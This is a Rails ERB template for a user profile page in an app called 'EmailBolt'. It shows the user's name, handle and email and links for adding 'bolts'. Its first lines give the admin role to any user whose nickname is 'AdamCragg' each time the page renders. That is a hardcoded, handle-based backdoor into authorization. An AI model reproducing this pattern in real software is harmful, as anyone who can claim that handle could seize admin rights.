<%  if @user.nickname == "AdamCragg" %>
<%  @user.add_role :admin %>
<%  end %>
<% content_for :title, "EmailBolt" %>
<div class="row large-12"><p></p></div>
<div class="row">
 <%#= debug(@user.bolts) %>
 <%#= get_routes %>
  <!-- Side Bar -->
 
        <div id="firstStop" class="large-4 small-12 medium-4 columns">
 
          <%= image_tag(@user.image, :class => "hide-for-small") %><br />
          <div class="panel">
            <h3><%= @user.name %></h3>
            <p></p>
            <h5 class="subheader"><p>Handle: <%= @user.nickname %></p>
            <p>Email: <%= link_to @user.email  , @user.nickname + '/edit'   %></p>
				<%#= create_route(1, "Test email", "adam.cragg@sandbox2609.mailgun.org", "adam.cragg@gmail.com") %>
				<%#= temp = get_routes %>
        <a href="/bolts/new" class="button small-12 medium-12 large-12 [secondary success alert]">Add custom bolt</a>
        <a href="/bolts/instant" style="color:white;" class="small-12 medium-12 large-12 button">Add instant bolt</a>
            </h5>
          </div>
 
          <!-- <a href="#">
          <div class="panel callout radius">
            <h6>99  items in your cart</h6>
          </div>
          </a> -->
        <%#= @user.add_role :admin %>
        </div>
 
    <!-- End Side Bar -->
 
 
    <div class="large-8 small-12 medium-8 columns">
    
    
    <%= render ('shared/boltfeed') %>
 
    </div>
    </div>
      
<%= render ('shared/footer') %>
 
